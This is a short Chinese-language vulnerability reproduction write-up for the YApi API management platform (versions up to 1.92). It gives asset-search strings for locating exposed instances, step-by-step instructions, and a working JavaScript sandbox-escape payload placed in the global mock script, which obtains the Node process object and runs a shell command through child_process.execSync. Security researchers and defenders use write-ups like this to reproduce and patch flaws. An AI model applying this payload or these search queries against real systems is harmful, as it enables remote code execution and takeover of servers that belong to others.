一、简介
YAPI是由去哪儿网移动架构组(简称YMFE，一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具，是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务，可以帮助开发者轻松创建、发布和维护不同项目，不同平台的API。有了YAPI，我们可以很方便的测试、管理和维护多个项目的API接口，不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭)，YAPI是一个独立的服务平台。

二、影响版本和危害
YApi<=V1.92 All
YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问。
YApi服务，导致攻击者注册用户后，即可通过 Mock功能远程执行任意代码。

三、资产查询
icon_hash=“-715193973”
app=“YApi”

四、漏洞复现
1、目标网站，注册用户

2、点击添加项目

3、输入项目名称，点击创建项目

4、在全局mock脚本中写入POC并保存
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor(‘return process’)
const process = myfun()
mockJson = process.mainModule.require(“child_process”).execSync(“whoami”).toString()

5、接口处填写内容并提交

6、点击接口名称

7、点击mock地址

8、命令执行成功